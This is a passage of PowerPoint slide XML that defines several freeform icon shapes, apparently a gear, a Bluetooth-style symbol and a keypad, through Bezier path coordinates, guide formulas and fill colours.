                  <a:pt x="14" y="52"/>
                  <a:pt x="14" y="52"/>
                  <a:pt x="14" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="53"/>
                  <a:pt x="13" y="53"/>
                  <a:pt x="13" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="53"/>
                  <a:pt x="12" y="53"/>
                  <a:pt x="12" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10" y="50"/>
                  <a:pt x="7" y="48"/>
                  <a:pt x="5" y="46"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="46"/>
                  <a:pt x="5" y="45"/>
                  <a:pt x="5" y="45"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="45"/>
                  <a:pt x="5" y="44"/>
                  <a:pt x="5" y="44"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="42"/>
                  <a:pt x="8" y="41"/>
                  <a:pt x="9" y="39"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9" y="38"/>
                  <a:pt x="8" y="37"/>
                  <a:pt x="8" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="34"/>
                  <a:pt x="1" y="34"/>
                  <a:pt x="1" y="34"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="34"/>
                  <a:pt x="0" y="33"/>
                  <a:pt x="0" y="33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4"/>
                  <a:pt x="0" y="23"/>
                  <a:pt x="1" y="23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21"/>
                  <a:pt x="9" y="20"/>
                  <a:pt x="9" y="18"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="17"/>
                  <a:pt x="7" y="15"/>
                  <a:pt x="5" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="13"/>
                  <a:pt x="5" y="13"/>
                  <a:pt x="5" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="12"/>
                  <a:pt x="5" y="12"/>
                  <a:pt x="5" y="11"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="10"/>
                  <a:pt x="11" y="5"/>
                  <a:pt x="13" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="5"/>
                  <a:pt x="13" y="5"/>
                  <a:pt x="14" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="9"/>
                  <a:pt x="19" y="9"/>
                  <a:pt x="19" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20" y="9"/>
                  <a:pt x="21" y="8"/>
                  <a:pt x="22" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="22" y="5"/>
                  <a:pt x="23" y="3"/>
                  <a:pt x="23" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="0"/>
                  <a:pt x="24" y="0"/>
                  <a:pt x="25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4" y="0"/>
                  <a:pt x="34" y="0"/>
                  <a:pt x="34" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="8"/>
                  <a:pt x="36" y="8"/>
                  <a:pt x="36" y="8"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="37" y="8"/>
                  <a:pt x="38" y="9"/>
                  <a:pt x="39" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="44" y="5"/>
                  <a:pt x="44" y="5"/>
                  <a:pt x="44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8" y="7"/>
                  <a:pt x="51" y="9"/>
                  <a:pt x="52" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="12"/>
                  <a:pt x="53" y="12"/>
                  <a:pt x="53" y="12"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="53" y="13"/>
                  <a:pt x="53" y="13"/>
                  <a:pt x="52" y="13"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="15"/>
                  <a:pt x="50" y="17"/>
                  <a:pt x="48" y="18"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="49" y="20"/>
                  <a:pt x="50" y="21"/>
                  <a:pt x="50" y="22"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="23"/>
                  <a:pt x="57" y="23"/>
                  <a:pt x="57" y="23"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="23"/>
                  <a:pt x="58" y="24"/>
                  <a:pt x="58" y="25"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58" y="33"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="29" y="19"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="24" y="19"/>
                  <a:pt x="19" y="23"/>
                  <a:pt x="19" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="34"/>
                  <a:pt x="24" y="38"/>
                  <a:pt x="29" y="38"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="38"/>
                  <a:pt x="39" y="34"/>
                  <a:pt x="39" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="39" y="23"/>
                  <a:pt x="34" y="19"/>
                  <a:pt x="29" y="19"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="5B9BD5"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914217"/>
            <a:endParaRPr lang="en-IN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3" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ACCDA7-B9D3-4595-A62B-C7B0D5F9C1D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14853" y="5223350"/>
            <a:ext cx="333306" cy="407018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 226881 w 144"/>
              <a:gd name="T1" fmla="*/ 129977 h 256"/>
              <a:gd name="T2" fmla="*/ 226881 w 144"/>
              <a:gd name="T3" fmla="*/ 129977 h 256"/>
              <a:gd name="T4" fmla="*/ 150714 w 144"/>
              <a:gd name="T5" fmla="*/ 207963 h 256"/>
              <a:gd name="T6" fmla="*/ 226881 w 144"/>
              <a:gd name="T7" fmla="*/ 285948 h 256"/>
              <a:gd name="T8" fmla="*/ 233363 w 144"/>
              <a:gd name="T9" fmla="*/ 298946 h 256"/>
              <a:gd name="T10" fmla="*/ 226881 w 144"/>
              <a:gd name="T11" fmla="*/ 311944 h 256"/>
              <a:gd name="T12" fmla="*/ 129646 w 144"/>
              <a:gd name="T13" fmla="*/ 409426 h 256"/>
              <a:gd name="T14" fmla="*/ 116682 w 144"/>
              <a:gd name="T15" fmla="*/ 415925 h 256"/>
              <a:gd name="T16" fmla="*/ 97235 w 144"/>
              <a:gd name="T17" fmla="*/ 396429 h 256"/>
              <a:gd name="T18" fmla="*/ 97235 w 144"/>
              <a:gd name="T19" fmla="*/ 261578 h 256"/>
              <a:gd name="T20" fmla="*/ 32412 w 144"/>
              <a:gd name="T21" fmla="*/ 324941 h 256"/>
              <a:gd name="T22" fmla="*/ 19447 w 144"/>
              <a:gd name="T23" fmla="*/ 331440 h 256"/>
              <a:gd name="T24" fmla="*/ 0 w 144"/>
              <a:gd name="T25" fmla="*/ 311944 h 256"/>
              <a:gd name="T26" fmla="*/ 6482 w 144"/>
              <a:gd name="T27" fmla="*/ 298946 h 256"/>
              <a:gd name="T28" fmla="*/ 95614 w 144"/>
              <a:gd name="T29" fmla="*/ 207963 h 256"/>
              <a:gd name="T30" fmla="*/ 6482 w 144"/>
              <a:gd name="T31" fmla="*/ 116979 h 256"/>
              <a:gd name="T32" fmla="*/ 0 w 144"/>
              <a:gd name="T33" fmla="*/ 103981 h 256"/>
              <a:gd name="T34" fmla="*/ 19447 w 144"/>
              <a:gd name="T35" fmla="*/ 84485 h 256"/>
              <a:gd name="T36" fmla="*/ 32412 w 144"/>
              <a:gd name="T37" fmla="*/ 90984 h 256"/>
              <a:gd name="T38" fmla="*/ 97235 w 144"/>
              <a:gd name="T39" fmla="*/ 154347 h 256"/>
              <a:gd name="T40" fmla="*/ 97235 w 144"/>
              <a:gd name="T41" fmla="*/ 19496 h 256"/>
              <a:gd name="T42" fmla="*/ 116682 w 144"/>
              <a:gd name="T43" fmla="*/ 0 h 256"/>
              <a:gd name="T44" fmla="*/ 129646 w 144"/>
              <a:gd name="T45" fmla="*/ 6499 h 256"/>
              <a:gd name="T46" fmla="*/ 226881 w 144"/>
              <a:gd name="T47" fmla="*/ 103981 h 256"/>
              <a:gd name="T48" fmla="*/ 233363 w 144"/>
              <a:gd name="T49" fmla="*/ 116979 h 256"/>
              <a:gd name="T50" fmla="*/ 226881 w 144"/>
              <a:gd name="T51" fmla="*/ 129977 h 256"/>
              <a:gd name="T52" fmla="*/ 136128 w 144"/>
              <a:gd name="T53" fmla="*/ 349312 h 256"/>
              <a:gd name="T54" fmla="*/ 186366 w 144"/>
              <a:gd name="T55" fmla="*/ 298946 h 256"/>
              <a:gd name="T56" fmla="*/ 136128 w 144"/>
              <a:gd name="T57" fmla="*/ 248580 h 256"/>
              <a:gd name="T58" fmla="*/ 136128 w 144"/>
              <a:gd name="T59" fmla="*/ 349312 h 256"/>
              <a:gd name="T60" fmla="*/ 136128 w 144"/>
              <a:gd name="T61" fmla="*/ 66613 h 256"/>
              <a:gd name="T62" fmla="*/ 136128 w 144"/>
              <a:gd name="T63" fmla="*/ 167345 h 256"/>
              <a:gd name="T64" fmla="*/ 186366 w 144"/>
              <a:gd name="T65" fmla="*/ 116979 h 256"/>
              <a:gd name="T66" fmla="*/ 136128 w 144"/>
              <a:gd name="T67" fmla="*/ 66613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44" h="256">
                <a:moveTo>
                  <a:pt x="140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3" y="178"/>
                  <a:pt x="144" y="181"/>
                  <a:pt x="144" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="187"/>
                  <a:pt x="143" y="190"/>
                  <a:pt x="140" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="255"/>
                  <a:pt x="75" y="256"/>
                  <a:pt x="72" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="256"/>
                  <a:pt x="60" y="251"/>
                  <a:pt x="60" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161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18" y="203"/>
                  <a:pt x="15" y="204"/>
                  <a:pt x="12" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="204"/>
                  <a:pt x="0" y="199"/>
                  <a:pt x="0" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="189"/>
                  <a:pt x="1" y="186"/>
                  <a:pt x="4" y="184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0"/>
                  <a:pt x="0" y="67"/>
                  <a:pt x="0" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="57"/>
                  <a:pt x="5" y="52"/>
                  <a:pt x="12" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="52"/>
                  <a:pt x="18" y="53"/>
                  <a:pt x="20" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95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75" y="0"/>
                  <a:pt x="78" y="1"/>
                  <a:pt x="80" y="4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3" y="66"/>
                  <a:pt x="144" y="69"/>
                  <a:pt x="144" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="75"/>
                  <a:pt x="143" y="78"/>
                  <a:pt x="140" y="80"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="84" y="215"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="215"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="41"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="41"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900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24" name="Freeform 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA6518B-9C4A-45CA-B203-407580CCFBB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892538" y="5241258"/>
            <a:ext cx="398791" cy="389110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 200226 w 63"/>
              <a:gd name="T1" fmla="*/ 233362 h 68"/>
              <a:gd name="T2" fmla="*/ 0 w 63"/>
              <a:gd name="T3" fmla="*/ 216203 h 68"/>
              <a:gd name="T4" fmla="*/ 17261 w 63"/>
              <a:gd name="T5" fmla="*/ 0 h 68"/>
              <a:gd name="T6" fmla="*/ 217487 w 63"/>
              <a:gd name="T7" fmla="*/ 17159 h 68"/>
              <a:gd name="T8" fmla="*/ 200226 w 63"/>
              <a:gd name="T9" fmla="*/ 24023 h 68"/>
              <a:gd name="T10" fmla="*/ 24165 w 63"/>
              <a:gd name="T11" fmla="*/ 17159 h 68"/>
              <a:gd name="T12" fmla="*/ 17261 w 63"/>
              <a:gd name="T13" fmla="*/ 58341 h 68"/>
              <a:gd name="T14" fmla="*/ 193322 w 63"/>
              <a:gd name="T15" fmla="*/ 65204 h 68"/>
              <a:gd name="T16" fmla="*/ 200226 w 63"/>
              <a:gd name="T17" fmla="*/ 24023 h 68"/>
              <a:gd name="T18" fmla="*/ 17261 w 63"/>
              <a:gd name="T19" fmla="*/ 99522 h 68"/>
              <a:gd name="T20" fmla="*/ 48330 w 63"/>
              <a:gd name="T21" fmla="*/ 99522 h 68"/>
              <a:gd name="T22" fmla="*/ 31070 w 63"/>
              <a:gd name="T23" fmla="*/ 133840 h 68"/>
              <a:gd name="T24" fmla="*/ 31070 w 63"/>
              <a:gd name="T25" fmla="*/ 164726 h 68"/>
              <a:gd name="T26" fmla="*/ 31070 w 63"/>
              <a:gd name="T27" fmla="*/ 133840 h 68"/>
              <a:gd name="T28" fmla="*/ 17261 w 63"/>
              <a:gd name="T29" fmla="*/ 199044 h 68"/>
              <a:gd name="T30" fmla="*/ 48330 w 63"/>
              <a:gd name="T31" fmla="*/ 199044 h 68"/>
              <a:gd name="T32" fmla="*/ 82852 w 63"/>
              <a:gd name="T33" fmla="*/ 82363 h 68"/>
              <a:gd name="T34" fmla="*/ 82852 w 63"/>
              <a:gd name="T35" fmla="*/ 116681 h 68"/>
              <a:gd name="T36" fmla="*/ 82852 w 63"/>
              <a:gd name="T37" fmla="*/ 82363 h 68"/>
              <a:gd name="T38" fmla="*/ 65591 w 63"/>
              <a:gd name="T39" fmla="*/ 147567 h 68"/>
              <a:gd name="T40" fmla="*/ 100113 w 63"/>
              <a:gd name="T41" fmla="*/ 147567 h 68"/>
              <a:gd name="T42" fmla="*/ 82852 w 63"/>
              <a:gd name="T43" fmla="*/ 181885 h 68"/>
              <a:gd name="T44" fmla="*/ 82852 w 63"/>
              <a:gd name="T45" fmla="*/ 216203 h 68"/>
              <a:gd name="T46" fmla="*/ 82852 w 63"/>
              <a:gd name="T47" fmla="*/ 181885 h 68"/>
              <a:gd name="T48" fmla="*/ 117374 w 63"/>
              <a:gd name="T49" fmla="*/ 99522 h 68"/>
              <a:gd name="T50" fmla="*/ 148444 w 63"/>
              <a:gd name="T51" fmla="*/ 99522 h 68"/>
              <a:gd name="T52" fmla="*/ 134635 w 63"/>
              <a:gd name="T53" fmla="*/ 133840 h 68"/>
              <a:gd name="T54" fmla="*/ 134635 w 63"/>
              <a:gd name="T55" fmla="*/ 164726 h 68"/>
              <a:gd name="T56" fmla="*/ 134635 w 63"/>
              <a:gd name="T57" fmla="*/ 133840 h 68"/>
              <a:gd name="T58" fmla="*/ 117374 w 63"/>
              <a:gd name="T59" fmla="*/ 199044 h 68"/>
              <a:gd name="T60" fmla="*/ 148444 w 63"/>
              <a:gd name="T61" fmla="*/ 199044 h 68"/>
              <a:gd name="T62" fmla="*/ 182965 w 63"/>
              <a:gd name="T63" fmla="*/ 82363 h 68"/>
              <a:gd name="T64" fmla="*/ 182965 w 63"/>
              <a:gd name="T65" fmla="*/ 116681 h 68"/>
              <a:gd name="T66" fmla="*/ 182965 w 63"/>
              <a:gd name="T67" fmla="*/ 82363 h 68"/>
              <a:gd name="T68" fmla="*/ 182965 w 63"/>
              <a:gd name="T69" fmla="*/ 133840 h 68"/>
              <a:gd name="T70" fmla="*/ 165704 w 63"/>
              <a:gd name="T71" fmla="*/ 199044 h 68"/>
              <a:gd name="T72" fmla="*/ 200226 w 63"/>
              <a:gd name="T73" fmla="*/ 199044 h 6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3" h="68">
                <a:moveTo>
                  <a:pt x="63" y="63"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="63" y="66"/>
                  <a:pt x="61" y="68"/>
                  <a:pt x="58" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="68"/>
                  <a:pt x="5" y="68"/>
                  <a:pt x="5" y="68"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2" y="68"/>
                  <a:pt x="0" y="66"/>
                  <a:pt x="0" y="63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61" y="0"/>
                  <a:pt x="63" y="2"/>
                  <a:pt x="63" y="5"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="63" y="63"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58" y="7"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="6"/>
                  <a:pt x="57" y="5"/>
                  <a:pt x="56" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="5"/>
                  <a:pt x="7" y="5"/>
                  <a:pt x="7" y="5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6" y="5"/>
                  <a:pt x="5" y="6"/>
                  <a:pt x="5" y="7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8"/>
                  <a:pt x="6" y="19"/>
                  <a:pt x="7" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="19"/>
                  <a:pt x="56" y="19"/>
                  <a:pt x="56" y="19"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="19"/>
                  <a:pt x="58" y="18"/>
                  <a:pt x="58" y="17"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58" y="7"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9" y="24"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="24"/>
                  <a:pt x="5" y="26"/>
                  <a:pt x="5" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="32"/>
                  <a:pt x="7" y="34"/>
                  <a:pt x="9" y="34"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="34"/>
                  <a:pt x="14" y="32"/>
                  <a:pt x="14" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="26"/>
                  <a:pt x="12" y="24"/>
                  <a:pt x="9" y="24"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9" y="39"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="39"/>
                  <a:pt x="5" y="41"/>
                  <a:pt x="5" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="46"/>
                  <a:pt x="7" y="48"/>
                  <a:pt x="9" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="48"/>
                  <a:pt x="14" y="46"/>
                  <a:pt x="14" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="41"/>
                  <a:pt x="12" y="39"/>
                  <a:pt x="9" y="39"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="9" y="53"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="53"/>
                  <a:pt x="5" y="55"/>
                  <a:pt x="5" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="61"/>
                  <a:pt x="7" y="63"/>
                  <a:pt x="9" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12" y="63"/>
                  <a:pt x="14" y="61"/>
                  <a:pt x="14" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="55"/>
                  <a:pt x="12" y="53"/>
                  <a:pt x="9" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="24" y="24"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="24"/>
                  <a:pt x="19" y="26"/>
                  <a:pt x="19" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="32"/>
                  <a:pt x="21" y="34"/>
                  <a:pt x="24" y="34"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="34"/>
                  <a:pt x="29" y="32"/>
                  <a:pt x="29" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="26"/>
                  <a:pt x="27" y="24"/>
                  <a:pt x="24" y="24"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="24" y="39"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="39"/>
                  <a:pt x="19" y="41"/>
                  <a:pt x="19" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="46"/>
                  <a:pt x="21" y="48"/>
                  <a:pt x="24" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="48"/>
                  <a:pt x="29" y="46"/>
                  <a:pt x="29" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="41"/>
                  <a:pt x="27" y="39"/>
                  <a:pt x="24" y="39"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="24" y="53"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21" y="53"/>
                  <a:pt x="19" y="55"/>
                  <a:pt x="19" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19" y="61"/>
                  <a:pt x="21" y="63"/>
                  <a:pt x="24" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="27" y="63"/>
                  <a:pt x="29" y="61"/>
                  <a:pt x="29" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="29" y="55"/>
                  <a:pt x="27" y="53"/>
                  <a:pt x="24" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="39" y="24"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="24"/>
                  <a:pt x="34" y="26"/>
                  <a:pt x="34" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="32"/>
                  <a:pt x="36" y="34"/>
                  <a:pt x="39" y="34"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="34"/>
                  <a:pt x="43" y="32"/>
                  <a:pt x="43" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="26"/>
                  <a:pt x="41" y="24"/>
                  <a:pt x="39" y="24"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="39" y="39"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="39"/>
                  <a:pt x="34" y="41"/>
                  <a:pt x="34" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="46"/>
                  <a:pt x="36" y="48"/>
                  <a:pt x="39" y="48"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="48"/>
                  <a:pt x="43" y="46"/>
                  <a:pt x="43" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="41"/>
                  <a:pt x="41" y="39"/>
                  <a:pt x="39" y="39"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="39" y="53"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="36" y="53"/>
                  <a:pt x="34" y="55"/>
                  <a:pt x="34" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="61"/>
                  <a:pt x="36" y="63"/>
                  <a:pt x="39" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="41" y="63"/>
                  <a:pt x="43" y="61"/>
                  <a:pt x="43" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="43" y="55"/>
                  <a:pt x="41" y="53"/>
                  <a:pt x="39" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="53" y="24"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="24"/>
                  <a:pt x="48" y="26"/>
                  <a:pt x="48" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="32"/>
                  <a:pt x="51" y="34"/>
                  <a:pt x="53" y="34"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="34"/>
                  <a:pt x="58" y="32"/>
                  <a:pt x="58" y="29"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="26"/>
                  <a:pt x="56" y="24"/>
                  <a:pt x="53" y="24"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58" y="43"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="41"/>
                  <a:pt x="56" y="39"/>
                  <a:pt x="53" y="39"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="51" y="39"/>
                  <a:pt x="48" y="41"/>
                  <a:pt x="48" y="43"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="58"/>
                  <a:pt x="48" y="58"/>
                  <a:pt x="48" y="58"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="48" y="61"/>
                  <a:pt x="51" y="63"/>
                  <a:pt x="53" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="56" y="63"/>
                  <a:pt x="58" y="61"/>
                  <a:pt x="58" y="58"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58" y="43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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="Freeform 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F546DB-E94A-4F9F-BE48-3F1B7B9D1FD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8290113" y="5248226"/>
            <a:ext cx="424492" cy="382142"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 80 w 498"/>
              <a:gd name="T1" fmla="*/ 151 h 445"/>
              <a:gd name="T2" fmla="*/ 80 w 498"/>
              <a:gd name="T3" fmla="*/ 151 h 445"/>
              <a:gd name="T4" fmla="*/ 142 w 498"/>
              <a:gd name="T5" fmla="*/ 169 h 445"/>
              <a:gd name="T6" fmla="*/ 151 w 498"/>
              <a:gd name="T7" fmla="*/ 169 h 445"/>
              <a:gd name="T8" fmla="*/ 195 w 498"/>
              <a:gd name="T9" fmla="*/ 134 h 445"/>
              <a:gd name="T10" fmla="*/ 195 w 498"/>
              <a:gd name="T11" fmla="*/ 125 h 445"/>
              <a:gd name="T12" fmla="*/ 178 w 498"/>
              <a:gd name="T13" fmla="*/ 107 h 445"/>
              <a:gd name="T14" fmla="*/ 275 w 498"/>
              <a:gd name="T15" fmla="*/ 10 h 445"/>
              <a:gd name="T16" fmla="*/ 195 w 498"/>
              <a:gd name="T17" fmla="*/ 0 h 445"/>
              <a:gd name="T18" fmla="*/ 107 w 498"/>
